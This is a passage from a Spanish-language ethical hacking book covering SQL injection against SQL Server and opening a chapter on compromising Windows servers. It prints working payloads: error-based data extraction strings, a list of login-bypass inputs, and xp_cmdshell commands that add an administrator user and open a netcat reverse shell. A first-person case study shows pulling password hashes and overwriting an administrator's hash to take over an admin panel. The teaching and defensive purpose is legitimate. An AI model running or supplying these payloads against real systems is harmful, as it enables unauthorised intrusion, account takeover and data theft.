Libro. Para aprender muy bien el concepto de SQL y el comportamiento de la base de datos, es muy recomendable repasar el libro Aprendiendo MicrosoftSQL Server 2000 en 21 Días, del autor Richard Waymire(Prentice Hall, ISBN: 970260124X)

¿Qué se pue de ha cer con SQL In jec tion? El im pac to es en el ám bi to de la in for ma cióny del sis te ma ope ra ti vo, sal vo en las oca sio nes en las que el pro gra ma dor ha ya to ma do al gu nos re cau dos o los ni ve les de pri vi le -gios que no nos per mi tan eje cu tar al go. Pe ro si to do es tá por de fec to y no hay re -glas de fil tra do, las po si bi li da des son in nu me ra bles.Hay que te ner un po co de per se ve ran cia (si ge ne ra mos el error, pro bar de to do)y agu de za. En cuan to a lo es cri to en do cu men tos en con tra dos en Goo gle acer cade es ta téc ni ca, no es apli ca ble en la mi tad de los ca sos. No hay que lle var a ca -bo un che queo de se gu ri dad en SQL In jec tion ba sa do pu ra y ex clu si va men te entex tos de In ter net.

Si bien es fá cil apli car lo des de un ad vi sory de Bug traq (cuan do pu bli can una in yec -ción de ter mi na da so bre tal ver sión de una apli ca ción), no es lo mis mo que cuan donos en con tra mos fren te a una pá gi na pro gra ma da en ph p/asp +da ta ba se, de au tory úni ca. Tam bién po de mos leer es tos tex tos bá si cos:• Guía de prue bas OWASP v2.0 (ww w.o was p.or g/i ma ges /2/2d/O WASP _Tes -ting _Gui de_v2_s pa nish _doc .zip).

• CEH v5 Mo du le 14 SQL In jec tion (mó du lo edu ca ti vo).• El whi te pa per so bre SQL In jec tion (SQL In jec tion Walkth rough) de Se cu ri Team(www .se cu ri team .com /se cu rity re views/5DP0N 1P76E.html).

• El tex to de Stuart Mc Do nald en (www .go vern ment se cu rit y.or g/ar ti cles/SQ LIn -jec tion Mo de so fAt tack DefenceandWhyItMatters.php).

Va le te ner en cuen ta que, en nin gu no de ellos, en con tra re mos, por ejem plo que, pa -ra sa car el pri mer va lor de una ta bla de pass words en tex to pla no (ge ne ral men te esla de una cuen ta de ad mi nis tra dor), bas ta con só lo po ner ‘ OR nom bre ta bla=1 -- amo do de ata jo, sin te ner que an dar pro ban do lar gos UNION /SE LECT es pe cia les.El error que ve re mos se rá:

Mi cro soft OLE DB Pro vi der for ODBC Dri vers error ‘800a0e07’

[Mi cro sof t][ODBC SQL Ser ver Dri ver][SQL Ser ver]Syn tax error con ver ting thevar char va lue ‘pass de lad min’ to a co lumn of da ta ty pe int.

173

Hacking Etico - [PDF Document] (177)

¿Muy simple no? Conviene intentarlo con otros nombres de tablas ya que, sipracticamos lo suficiente y en muchos contextos, encontraremos atajos muy útiles,formas de resolución y evasión. Veamos otros errores al inyectar código SQL en campos de datos:

* Inyectado: ‘ and 1=convert(int,@@version)--Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'Microsoft SQL Server 2000 - 8.00.2187 (Intel X86) Mar 7 200611:36:51 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition onWindows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int. Resultado: obtenemos la versión del servidor.

* Inyectado: ' and 1=convert(int,@@servername)--Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'GCIASISTEMAS' to a column of data type int. Resultado: Obtenemos el nombre del servidor.

* Inyectado: ' and 1=convert(int,db_name(1))--Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'master' to a column of data type int. Resultado: Nombre de la primera database.

* Inyectado: ' and 1=convert(int,user_name(3))--Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'webmaster' to a column of data type int. Resultado: Nombre del tercer usuario (podemos variar el número paraconfeccionar una lista de todos).

* Inyectado: ' and 1=convert(int,system_user)--Error: Microsoft OLE DB Provider for ODBC Drivers error '800a0e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'sa' to a column of data type int. Resultado: Nombre del usuario bajo el cual se ejecuta la aplicación de Database.

Al gu nos ejem plos de in yec ción pa ra by pass de ac ce sos que po de mos pro bar agre -gan do es pa cios, pa rén te sis o co mi llas sim ples son:

174

Hacking Etico - [PDF Document] (178)

‘ ; ‘; ‘-- ‘or 1 = 1 -- ‘ or 1=1 -- ‘or 1=1 -- ‘ or 1 = 1 --‘ or 1=1 -- or 1=1 -- or 1=1 -- or 1 = 1 --or 1=1 -- “ or 1=1 -- ‘ or a=a -- “ or “a”=”a‘) or (‘a’=’a “) or (“a”=”a a” or “a”=”a a” or 1=1 --a’ or 1=1 -- a’ or ‘a’=’a a’) or (‘a’=’a a”) or (“a”=”aad min’-- ‘ or 0=0 -- “ or 0=0 -- or 0=0 --‘ or 0=0 # “ or 0=0 # or 0=0 # )’or 1=1;

Evasión de reglas a nivel campo de datos

Imaginemos que estamos frente a un login de dos campos típicos: usuario ypassword. Éstos tienen una característica especial a modo de seguridad por partedel programador: en estos campos no pueden colocarse más que 6 caracteresalfanuméricos en cada uno. En este caso, la información seguiría este recorrido:usuario > página > database. Claramente, están filtrados desde el mismo código dela página, en donde veremos algo como maxLength="6".¿Cómo saltamos esa comprobación? Modificando la información con la ayuda de un proxy y codificándola (noconfundir codificar con cifrar), tal como lo requiere el submit, para luego enviarlaa la database: usuario > página > proxy (donde la modificaremos en tránsito u on-the-fly) > database.Para ello, necesitamos un grupo de herramientas de seguridad open source entrelas que, actualmente, es muy recomendable la que podemos descargar dewww.ioactive.com/tools/IOATools-021805.exe. Además, nos hará falta un buenbrowser, como Firefox.IOAcive Tools es un excelente kit de herramientas para chequeos de seguridad enaplicaciones web, compuesto por:

• Snark: un proxy at tack, en don de mo di fi ca re mos la in for ma ción en trán si to an tes deque lle gue al ser vi dor. Nos per mi ti rá mo di fi car y gra bar los re quest (pe ti cio nes http).

• Morf: es un en co dea dor que co di fi ca URL, Ba se64, html, views ta te, HEX (Perl y C

175

La sin ta xis por in yec tar y el error que mues tre el ser ver es ta rán siem pre li ga dos a va ria bles ta les co mo el

pro gra ma dor que es cri bió el có di go fuen te de la pá gi na o apli ca ción, có mo és te ha de cla ra do sus va ria bles y

di se ña do la da ta ba se. La ma ne ra en que se ad mi nis tró el ges tor de ba se de da tos, y los usua rios li ga dos a

ello tam bién cuen tan. Son mu chos los es ce na rios, to dos so bre con tex tos téc ni cos y de se gu ri dad va ria dos.

Es ce na rios

Hacking Etico - [PDF Document] (179)

array, md5, sha1, sql string, utf-7 y pem), aun que en es te ca so só lo uti li za re mos el URL.• Sas hi mi: se uti li za pa ra en viar re quests HTTP (es más có mo do que net cat).

IOActive. Se lec ción de com po nen tes du ran te la ins ta la ción de IOAc ti ve Tools.

• IE proxy chan ge: útil pa ra se tear el puer to del proxy al que es ta rá co nec ta do elbrow ser na ti vo de Win dows, el cual no usa re mos.

En es te ejem plo, só lo uti li za re mos Snark pa ra mo di fi car la in for ma ción que va delproxy al ser vi dor, Morf pa ra co di fi car los da tos y Fi re fox (www .mo zi lla-eu ro pe.or -g/es /pro ducts /fi re fox/).

Pro ce di mien to

Una vez que te ne mos las he rra mien tas ade cua das e ins ta la das, pro ce de mos con laeje cu ción de Snark. En la si guien te fi gu ra, po de mos ver los tres pri me ros ico nospul sa dos. El pri me ro sig ni fi ca que el proxy es tá co nec ta do al puer to de cla ra do enLo cal Port (5858). El se gun do, que se es tá gra ban do la se sión y el ter ce ro, que po -dre mos edi tar to do lo que su be al ser ver o da ta ba se, en tiem po real. Lue go eje cu -ta mos Fi re fox, va mos has ta el link del for mu la rio y lo con fi gu ra mos pa ra que se co -nec te al proxy lo cal (que mon ta Snark) y puer to de cla ra do en és te. Pa ra eso, va mosa He rra mien ta s/Op cio nes /Red /Con fi gu ra ción /Con fi gu ra ción Ma nual del Proxy.En los va lo res Proxy http, po ne mos lo cal host y, en Puer to: 5858.

176

Hacking Etico - [PDF Document] (180)

Snark. In ter faz grá fi ca de Snark. En la par te su pe rioriz quier da del pro gra ma, ve mos los tres pri me ros ico nos pul sa dos.

Co lo ca mos en el cam po un da to (x) a mo do de re fe ren cia vi sual y lo en via mos dan -do clic o con En ter. Snark apa re ce rá co mo en la fi gu ra que ve mos a con ti nua ción:

Petición. Al apre tar el bo tón En ter pa ra en viar los da tos, Snark abreuna pan ta lla pa ra edi tar el re quest. Allí reem pla za mos el va lor que en via mos

me dian te el for mu la rio (x), co lo can do el string co di fi ca do co mo mues tra la fi gu ra.

177

Los for mu la rios de da tos en via dos con el ti po de con te ni do ap pli ca tion/x-www-form-ur len co dedde ben ser co di fi ca dosde la si guien te ma ne ra: los nom bres de con trol y los va lo res se rán es ca pa dos, los es pa cios se rán reem pla za dos porsím bo los +y los ca rac te res re ser va dos se rán es ca pa dos co mo es tá des cri to en el RFC1738(www.rfc-es.org/rfc/rfc1738-es.txt), en la sec ción 2.2. Más in for ma ción so bre for mu la rios en www .w3.org/TR/htm l4/in te ract /forms.html.

En co dea do, co di fi ca ción URL, Ur len co ded

Hacking Etico - [PDF Document] (181)

Por ejem plo, ‘OR 1=1 — que da ría de es ta ma ne ra: ‘OR+1%3D1+—. Esa con ver -sión se lo gra con la apli ca ción Morf (Plain to URL). Por úl ti mo, pre sio na mos Up -da te Con tent-Length pa ra ac tua li zar la cantidad de da tos por en viar y lis to.De ese mo do, ha bre mos sal ta do la se gu ri dad del cam po de da to in yec tan do el do -ble de los ca rac te res per mi ti dos –más allá de al fa nu mé ri cos- y, por otro la do, lo gra -mos ob te ner al gu na in for ma ción im por tan te ex traí da ba sa dos en có di go SQL in yec -ta do.

Ejem plos en el sis te ma ope ra ti voÉs tos son strings pa ra lo grar la eje cu ción, a tra vés de xp_cmds hell (Ex ten ded Sto redPro ce du re), de co man dos de sis te ma:

• ‘ exec mas ter..xp_cmds hell ‘net user eti co eti co /add’;-- : In ser ta un usua rio desis te ma.

• ‘ exec mas ter..xp_cmds hell ‘net lo cal group ad mi nis tra tors eti co /add’;-- :Al usua rio de sis te ma lo in te gra en el gru po de ad mi nis tra do res.

• ‘ exec mas ter..xp_cmds hell ‘nc di rec cio nip puer to -t -e cm d.e xe’;-- : Ex por -ta un prompt ms-dos vía net cat a de ter mi na do puer to y di rec ción IP de otra shell.

• );crea te ta ble sys ta ble s(a int iden tity,b var char(1000)) in sert in to sys ta blesexec mas ter..xp_cmds hell ‘ip con fig’-- : Crea una ta bla en la que lue go guar dael re sul ta do del co man do ip con fig.

Só lo usua rios del ti po sy sad min (asig na do a la apli ca ción que es tán in yec tan do)pue den eje cu tar xp_cmds hell y és te, en ca so de ser eje cu ta do, lo ha rá en el con tex -to de se gu ri dad en el que es té co rrien do el ser vi cio SQL. Co mo ve mos, la cues tiónde pri vi le gios en ser vi cios y usua rios es de li ca da.

178

Pa ra en con trar una ex pli ca ción de Mi cro soft so bre Ex ten ded Sto red Pro ce du re o Pro -ce di mien to Ex ten di do Al ma ce na do xp_cmds hell, po de mos vi si tar la di rec ciónhttp://msdn .mi cro soft .com /li brary /de faul t.as p?ur l=/li brar y/en-us/tsql ref/ts_x p_aa-sz_4j xo.asp.

Ex ten ded Sto red Pro ce du re

Hacking Etico - [PDF Document] (182)

Strings. www.s tring-func tions .com es un si tio en don dese pue de co di fi car un string SQL, en tre otros ti pos de ta reas on li ne.

He rra mien tas au to ma ti za dasExis ten de ce nas de he rra mien tas que son ca pa ces de tra ba jar de mo do au to ma ti za -do en al gu nos as pec tos de la in yec ción de có di go SQL.

Es tas he rra mien tas no son má gi cas, ya que por sí so las no pue den ha cer mu cho sinla ló gi ca que le apli que mos no so tros y el se teo ne ce sa rio pa ra que nos brin den al -gún ti po de ven ta ja en tiem po o re sul ta do. Es con ve nien te to mar se el tiem po quesea ne ce sa rio y ha cer el che queo de la apli ca ción a ma no. Cuan do ne ce si ta mos au -to ma ti zar al go (sa bien do que po de mos sa car pro ve cho de ello), po de mos usar lashe rra mien tas que apa re cen a con ti nua ción.

Sql nin ja

Su si tio ofi cial es: http://sql nin ja .sour ce for ge .net, y sus ca rac te rís ti cas des ta ca das(tra du ci das y tes tea das) son: • De tec ción vía fin ger print del ser vi dor SQL re mo to: ver sión, usua rio que eje cu tala apli ca ción, pri vi le gios de és te, ve ri fi ca dis po ni bi li dad de xp_cmds hell y mo do de

179

Hacking Etico - [PDF Document] (183)

au ten ti fi ca ción DB.• Bru te for ce del usua rio sa vía dic cio na rio e in cre men tal.• Crea ción de un xp_cmds hell si el ori gi nal fue re mo vi do.• Upload de ar chi vos, net cat o cual quier eje cu ta ble uti li zan do http re quests so la men te.• Es ca neo TC P/UDP ha cia el ata can te pa ra en con trar un puer to y así pa sar a tra -vés del fi re wall des de la red ata ca da, pa ra lue go em plear por allí una shell in ver -sa.

• Di rec ta e in ver sa binds hell, TC P/UDP.• Pseu do dns shell tu ne lea da (dns-tun ne led), cuan do TC P/UDP no es tán dis po ni -bles pa ra una shell di rec ta o re ver sa, pe ro la DB pue de re sol ver nom bres ex ter -nos.

SQLninja. Aquí ve mos la he rra mien ta sql nin ja eje cu ta da so bre una shell deFreeBSD 5.5 (ser vi dor de tes teo), en te ra men te pro gra ma da en Perl por su au tor ice sur fer.

180

En www .se cu rity-hacks .com /2007/05/18/top-15-free-sql-in jec tion-scan ners, po de mosen con trar un lis ta do con el top 15 de las he rra mien tas de SQL in jec tion, con al gu nosde ta lles so bre ca da una de ella y el en la ce al si tio del que po dre mos des car gar la.

He rra mien tas de SQL In jec tion

Hacking Etico - [PDF Document] (184)

No es una he rra mien ta que se uti li za só lo con eje cu tar la. Hay que con fi gu rar un ar chi -vo lla ma do nin ja .conf an tes de lan zar la a tra ba jar, y és te lle va de ter mi na dos pa rá me -tros del ob je ti vo. Con vie ne leer muy bien su how-to y se pue de eje cu tar ba jo Li nux.

Sql map

Es ta he rra mien ta fue de sa rro lla da en Pyt hon ini cial men te por Da nie le Be lluc ci, yman te ni da por Ber nar do Da me le. Su si tio ofi cial es http://sql map .sour ce for ge .net,y sus ca rac te rís ti cas des ta ca das (tes tea das) son:

• Mues tra ver sio nes de los ob je ti vos y tec no lo gía.• Mues tra con te ni dos de ar chi vos en ca so de MySQL.• Ma pea en tex to pla no con te ni do de los re gis tros.• Mues tra nom bres de ta blas, da ta ba ses y su ali nea mien to.• Usua rios y pri vi le gios in vo lu cra dos.• Pro ce sa ex pre sio nes SQL ar te sa na les (nues tras pro pias Querys).• Se pue de uti li zar in fo des de y ha cia ar chi vos en tex to pla no.

SQLmap. En es te grá fi co, ve mos sql map eje cu ta doen una Shell, tes tean do pa rá me tros de un ob je ti vo.

181

Un ro bot que ha ce ata ques ma si vos au to ma ti za dos (mass at tack) uti li zan do SQL In jec -tion in fec tó el ar chi vo in dex de más de 100.000 si tios pa ra in fec tar a sus vi si tan tes. Po -de mos en con trar in for ma ción adi cio nal so bre es te ca so en www .we bapp se c.org /pro -jects/w hid/b yi d_id_2007-82.shtml.

In ci den te

Hacking Etico - [PDF Document] (185)

He rra mien ta pu ra y ex clu si va men te del ti po shell /prompt. La eje cu ción se ha ce atra vés de una so la lí nea de co man dos con ca da pa rá me tro de fi ni do, y no po see me -nú de ac cio nes. Tam bién se pue de eje cu tar en Li nux.Va le ver las op cio nes y prac ti car bien, ya que, si no te ne mos ex pe rien cia, no re sul -ta muy ami ga ble al prin ci pio. Es re co men da ble leer el READ ME y ba jar los whi -te pa pers que allí es tán lis ta dos.

SQL In jec tion Pen tes ting Tool

IPT. In ter faz grá fi ca de SQL In jec tion Pen tes ting Tool,es cri ta en VB6 y pues ta a dis po ni bi li dad por los ru sos de IT De fen ce.

He rra mien ta pa ra Win dows, ami ga ble y útil, con su si tio ofi cial en http://sql too l.it de -

182

Si que re mos au men tar nues tros co no ci mien tos so bre los con cep tos bá si cos y ge ne ra -les de ba se de da tos y así re fres car nues tra me mo ria o apren der más, po de mos vi si -tar el tra ba jo pu bli ca do en www .mo no gra fias .com /tra ba jos 11/bas da /bas da.shtml.

Ba ses de da tos bá si cas

Hacking Etico - [PDF Document] (186)

fen ce .ru/in de xeng.html. Sus ca rac te rís ti cas des ta ca das (tra du ci das y tes tea das) son:

• In yec ta a tra vés de POST, GET y GET-POST con coo kies.• Ter mi nal Http Raw.• Su be ar chi vos al ser vi dor.• Lee ar chi vos del ser vi dor.• Ha ce dum peos de da ta ba ses.• Eje cu ta shell in ver sas des de la da ta ba se.• Au to de tec ción y bru te for ce muy in te re san tes gra cias a sus dic cio na rios de pa la -bras cus to mi za bles.

Es re co men da ble ali near sus dic cio na rios (alo ja dos en la car pe ta C:\Ar chi vos depro gra ma\SQL TooL) a los ob je ti vos es pa ño les.

Ca so real de et hi cal hac king con SQL In jec tion

Les con ta ré có mo, ha ce poco tiempo, pu de lo grar el ac ce so a tra vés de es ta téc ni -ca a los da tos de la da ta ba se y al pa nel de ad mi nis tra ción de una apli ca ción web pri -va da. És ta ma ne ja da tos sen si bles de or ga ni za cio nes for ma les, to do aque llo re la cio -na do a pla nea mien to es tra té gi co, ges tión de la in for ma ción ins ti tu cio nal y usua riosin vo lu cra dos. Es una so lu ción pa ra cor po ra cio nes re co men da da por IBM, y su li -cen cia cues ta mucho di ne ro. An tes de ex pli car les muy bre ve men te có mo fue elpro ce di mien to, les comento que las vul ne ra bi li da des en con tra das ya fue ron re por -ta das a las par tes co rres pon dien tes.

Cuan do re ci bí los da tos del host, en tré en la pá gi na y, en prin ci pio, to do era de lomás nor mal: un ac ce so de user /pass, un link pa ra re cu pe rar la cla ve, lo gos y co rreode con tac to.Pa ra co men zar, pro bé in tro du cien do al gu nas co mi llas y ca rac te res en los cam posde user y pass, y ob tu ve un error ra ro: es ta apli ca ción no de ja ba ver los erro res deSQL, só lo mos tra ba un car tel (no el tí pi co de SQL Ser ver) y un lo go ro jo. In ten téha cer un by pass nor mal de mu chas for mas, sin re sul ta dos. In ten té sa car in for ma -ción, y no mos tra ba na da o ha cía un sim ple re fresh. Se gu ra men te, al gu nas me di dasde pre cau ción te nía, ya que los erro res es ta ban de pu ra dos, y el by pass di rec to nofun cio na ba. Las ho ras vo la ban.Pres té aten ción al link de rea sig na ción de cla ve y en tré. Al ha cer lo, me en con tré conuna pan ta lla que con te nía cua tro cam pos de da tos. Es to se tor na ba in te re san te.Pri mer cam po: nom bre.Se gun do cam po: cla ve ac tual.

183

Hacking Etico - [PDF Document] (187)

Ter cer cam po: cla ve nue va.Cuar to cam po: rei te ra ción de cla ve nue va.Me tí una co mi lla sim ple en to dos ellos y apre té En ter. Ta ma ña sor pre sa cuan do viel tí pi co error de da ta ba se en tex to pla no en mi pan ta lla.

Me pu se con el proxy (Snark) a ve ri fi car los cam pos, y el vul ne ra ble era el del nom -bre de usua rio. Co men cé con al go de da ta ba se gat he ring o ma peo de da tos. Lo ra -ro era que só lo se po dían in yec tar de ter mi na dos pa rá me tros, y no cual quier stringen SQL era in ter pre ta do tal cual iba in yec ta do. La ma yo ría de las ve ces, só lo mos -tra ba un car tel de error pro pio de la apli ca ción y lue go ha cia un re fresh.

‘ ha ving 1=1 -- me dio el da to AP P_U SUA RIO.U SUA RIO_ID, con un es pa cioen tre la co mi lla sim ple y ha ving, si no, no fun cio na ba. Lue go, con GROUP BY,acu mu lan do da tos en el string.

‘ group by AP P_U SUA RIO.U SUA RIO_ID --

‘ group by AP P_U SUA RIO.U SUA RIO_I D,AP P_U SUA RIO.PWD ha ving 1=1 --

‘ group by AP P_U SUA RIO.U SUA RIO_I D,AP P_U SUA RIO.PW D,AP P_U SUA RIO.I S_AD MIN ha ving 1=1 --

‘ group by AP P_U SUA RIO.U SUA RIO_I D,AP P_U SUA RIO.PW D,AP P_U SUA RIO.I S_AD MI N,AP P_U SUA RIO.FULL_NAME ha ving 1=1 --

Me dian te ata jos y des car tan do cien co sas que in ten té (se fue ron las es tre llas, ylos pá ja ros ya co men za ban a can tar fue ra de mi ven ta na), ya te nía en mi po deral gu nos usua rios, nom bres com ple tos y pass words has hea dos. Pe ro me en con -tré con una tra ba. El pass word es ta ba guar da do en un cam po String (tex to) has -hea do de una ma ne ra en la que no lo iba a des ci frar tan fá cil men te. Se veía así:

184

Existe un escaner de vulnerabilidades en aplicaciones llamado Chorizo. Su sitio eswww.chorizo-scanner.com Este buscará: Cross Site Scripting (XSS), Cross Site RequestForging (CSRF), Code Inclusion, Remote Code Execution, vulnerabilidades PHP, Sessioninjection y más.

Herramienta comercial

Hacking Etico - [PDF Document] (188)

&H0A 03756D6E615672737138798A6164AEA F7AC8BB3690D 5674F3EE -4B9306A.

Ha bían uti li za do una téc ni ca lla ma da co rri mien to de bits y só lo sus de sa rro lla do -res co no cían el al go rit mo (co mo un sim ple cu rio so in te re sa do en la se gu ri dad delpro duc to, in ten té que me ex pli ca ran a tra vés del e-mail de con tac to en el si tio). Noera un sim ple hash md5. Ha bía que dar un pa so atrás. Te nía ago ta das las po si bi li -da des has ta ahí de ha cer al go vía SQL In jec tion ya que la apli ca ción no me de vol -vía to dos los erro res que in ten ta ba ge ne rar pa ra sa car da tos.

No po día dar de al ta un usua rio ad mi nis tra dor ni uno co mún, ya que si lo ha cía, note nía idea de có mo ci frar del mis mo mo do un pass word. La apli ca ción no me to ma -ba co mo ac ce so vá li do un user /pass en tex to pla no por que és ta, al to mar lo del re gis -tro, re con ver tía el pass word. En cam bio, sí po día mo di fi car el va lor del hash. Só lores ta ba sa ber el va lor equi va len te a un pass word en tex to pla no, y eso po día ser unpo co más sim ple que apli car ló gi ca de crip toa na lis ta, osea, rom pien do el ci fra do. Erauna apli ca ción uti li za da por eje cu ti vos quie nes, en su ma yo ría, no son lo su fi cien te -men te cons cien tes de la se gu ri dad de la in for ma ción co mo pa ra te ner un buen pass -word. Por otro la do, muy ra ra vez se le asig na a un eje cu ti vo un pass word real -men te fuer te.

Des cu brir uno a ma no es una de las téc ni cas más te dio sas de la se gu ri dad in for má -ti ca, aun que, te nía dos co sas a fa vor:1. Sa bía el nom bre com ple to del usua rio (no se po dían sa car los use rID de la da -ta ba se, sin su nom bre com ple to).

2. La apli ca ción, en los in ten tos de lo gueo fa lli do, da ba los avi sos de usua rio ine -xis ten te y pass word erró neo.

To mé el nom bre com ple to de un usua rio (Ló pez, Ma rio) ex traí do de la co lum naFULL _NA ME con el si guien te String in ser ta do en el cam po vul ne ra ble Nom bre:‘ union se lect FULL _NA ME,1,1,1 from AP P_U SUA RIO WHE RE FULL _NA -ME > ‘m’ --. Co men cé a pro bar en los cam pos user y pass de la apli ca ción:

185

Cuan do es ta mos in yec tan do, pro be mos pul sar el bo tón OK en ca so de un for mu la rio ylue go in yec tar lo mis mo, pe ro pre sio nan do En ter. De esa ma ne ra, mu chas ve ces seevi ta la ne ce si dad de in ten tar un mé to do de eva sión an te al gu na re gla pa ra cam po deda tos es cri ta en Ja vaS cript.

Pro bar dis tin tas for mas

Hacking Etico - [PDF Document] (189)

ma rio .lo pez +pass Cartel: usua rio ine xis ten te.mlo pez +pass Cartel: usua rio ine xis ten te.ml +pass Cartel: usua rio ine xis ten te.ma rio +pass Cartel: usua rio ine xis ten te.ma rio lo pez +pass Cartel: pass word erró neo.

Ex ce len te. El usua rio Ló pez, Ma rio, se lo guea co mo ma rio lo pez. Pro bé los pass -words más co mu nes y no tu ve que es pe rar mu cho pa ra dar con el co rrec to. Tu vela suer te de que el pass word era el nom bre de pi la, sim ple men te ma rio (la sor pre safue aún ma yor cuan do com pro bé que el 70% de los usua rios te nían por pass wordsu nom bre de pi la).

Cuan do su pe el sig ni fi ca do de ma rio, ex tra je el hash de Ma rio Ló pez:

‘ union se lect PWD,1,1,1 from AP P_U SUA RIO WHE RE FULL _NA ME =‘Lo pez, Ma rio’ --

&H0A 03756D6E615672737138798A6164AEA F7AC8BB3690D 5674F3EE -4B9306A

Si es te hash en rea li dad era el pass word “ma rio” ci fra do, en ton ces la so lu ción pa -ra lo grar ac ce so ad mi nis tra ti vo (ya te nía mos un ac ce so co mún de usua rio por Ma -rio Ló pez), era asig nar le es te hash al usua rio Juan Pé rez que es el ad mi nis tra dor yasí po der en trar con usua rio ad mi nis tra dor y pass word ma rio, al pa nel des de el ac -ce so. Y con el si guien te có di go pu de lle var a ca bo la ta rea:

‘ UP DA TE AP P_U SUA RIO SET PWD = ‘&H0A 03756D6E615672737138798A6164AEA F7AC8BB3690D 5674F3EE 4B9306A’ WHE RE FULL _NA ME = ‘Juan, Pe rez’ --

Fui al lo gin de ac ce so, co lo qué juan pe rez co mo usua rio, ma rio co mo pass wordy ac ce dí al pa nel de ad mi nis tra dor con to dos los ítems fun cio na les del sis te ma, da -

186

Si que re mos en con trar so lu cio nes pa ra mi ti gar el SQL In jec tion, po de mos vi si tar: htt p://in -for ma ti ca-prac ti ca .net /so lo co di go/in dex.ph p/2007/09/06/e vi tar-in yec cion-sql-ii, http -://pear.php .net /pac ka ge/DB, http://msdn .mi cro soft .com/msdn ma g/is sues/06/11/sql se cu -rity /de faul t.aspx ?lo c=es y www .dot net pue bla .com /por tal /Pu bli ca cio ne s/Ar ti cu lo s/848.aspx.

So lu cio nes a SQL In jec tion

Hacking Etico - [PDF Document] (190)

do mi pri vi le gio.Hi ce el re por te con al gu nas pan ta llas cap tu ra das e in for ma ción, lo en tre gué alrepresentante de la consultora que me con tra tó y to dos fe li ces. Hoy, la aplicación se encuentra bajo las medidas de seguridad correspondientes ylos desarrolladores tienen los detalles técnicos del caso.

Infosec. Sitio de redactores de documentos de seguridad, aqui podrán encontrar artículos relacionados a la materia. www.infosecwriters.com

187

Hacking Etico - [PDF Document] (191)

188

Más información:

www.rs-labs.com/paperswww.set-ezine.orgwww.rediris.es/cert

www.seguridad.unam.mxwww.hackthissite.org

www.networksecuritytoolkit.orgwww.cgisecurity.orgwww.honeyd.org

www.keyfocus.net/kfsensorwww.vulnerabilityassessment.co.uk

www.cisecurity.orgwww.securiteam.comwww.securitydocs.comwww.itsecurity.comwww.kriptopolis.orgwww.honeynet.orgwww.appsecinc.comwww.nextgenss.comwww.hakin9.orgwww.phrack.org

www.infosecnews.orgwww.infosecwriters.comwww.windowsecurity.comwww.net-security.org

www.l0t3k.orgwww.cert.orgwww.unsec.net

www.theargon.comwww.foundstone.com

Hacking Etico - [PDF Document] (192)

7 > ServidoresWindowsRevisión de la técnica de intrusión simple en

un servidor Windows mostrando, entre otras

cosas, un sencillo ejemplo sobre cómo obtener

de manera remota un prompt DOS a través de una

plataforma de exploits. Conoceremos algunas

herramientas especiales, su configuración y modo

de empleo y, también, veremos diferentes clases

de backdoors indetectables, binarios y de kernel

disparados como servicios o como partes de una

simple página web.

Hacking Etico - [PDF Document] (193)

IntroducciónMicrosoft posee una extensa lista de sistemas operativos. Está aún en producciónla familia 2000 en todas sus variedades, la 2003 y la más reciente 2008. A éstos, seles suman XP y Vista como terminales en general; y no olvidemos los obsoletos98/ME que perduran en funcionamiento en muchas organizaciones e institucionesdel continente y del mundo. No malgastaremos las páginas de este capítulo desen-trañando la arquitectura de cada uno de estos sistemas operativos, sino que hare-mos foco en los aspectos más interesantes, técnicas y herramientas relacionadasque hoy en día son utilizados en el hacking ético. Microsoft Windows es, en la ac-tualidad, el sistema operativo más utilizado por las organizaciones y, de su masivi-dad, surge el interés o la casualidad de que sea víctima del embate de los atacantes.Recordemos que lo desarrollado a continuación pertenece a una de las últimas etapas enun chequeo ético: la del ataque o penetración. Un intruso, luego de haber investigado eninternet, enumerado, analizado resultados y escaneado de modo agresivo (etapas anterio-res al embate final o penetración) logró, dentro de nuestro servidor Windows, conseguirun prompt MS-DOS para ejecutar comandos y dumpear el contenido del SAM.

Microsoft Windows 2000 [Version 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Generalmente, así se ve cuando se obtiene un prompt o línea de comandos MS-DOS debido a la ejecución del archivo cmd.exe. Es posible que el intruso puedaconseguirlo fácilmente si el servidor se encontrara descuidado, pero ¿por qué va aquerer saber el contenido del archivo SAM (System Account Manager) si es muy pro-bable que ya tenga privilegios System o de Administrador allí dentro?Las intenciones del intruso pueden ser diversas, pero el contenido, tanto del archi-vo SAM como del Shadow de un servidor Linux, genera en el atacante el mismo

190

Les recomiendo leer el libro Hacking Exposed Windows 3ra edición de McGraw Hill (di-ciembre 2007), con aspectos técnicos más detallados acerca de su seguridad y tecnicasavanzadas para el chequeo de sus vulnerabilidades.

Windows en profundidad

Hacking Etico - [PDF Document] (194)

deseo de obtenerlo, ya que ambos poseen las cuentas de sistema. En principio, unade las utilidades es para descifrar los passwords de los usuarios, ya sea para luegoleer sus e-mails o para probar ese mismo password en otro servidor de la red inter-na o terminal de la empresa, por si se repite el login y se consigue otro ingreso enlos recursos del escenario mediante SMB o Terminal Services.Al tener a mano las credenciales de autentificación de los usuarios reales, las po-sibilidades son muchas. También se puede querer ejecutar alguna aplicación bajodeterminado usuario o conocer la entropía de sus passwords (si es asignado porpolítica o si son palabras comunes, fuertes o débiles) o simplemente saberlo pa-ra utilizarlo en un futuro, en alguna ocasión de retorno o de necesidad (para pro-cesamiento o puente de ataque hacia otros objetivos)

Comprometer un servidor(con pocos clicks)

Un ejemplo de lo fácil que puede llegar a ser conseguir un prompt de modo remoto(el comun de la gente lo conoce como: meterse en la máquina ajena) es el de aprove-char una vulnerabilidad que esté presente en un objetivo que no tiene una adminis-tración adecuada, desde una gran utilidad como Metasploit Framework. Veamos unclaro y simple caso. En www.microsoft.com/technet/security/Bulletin/MS05-039.mspx, podemos encontrar el boletín (security advisory) acerca de esta falla.

Inicio. En Metasploit 3.1, el profesional ético selecciona el exploitde la falla Microsoft Plug and Play Buffer Overflow para ejecutarla

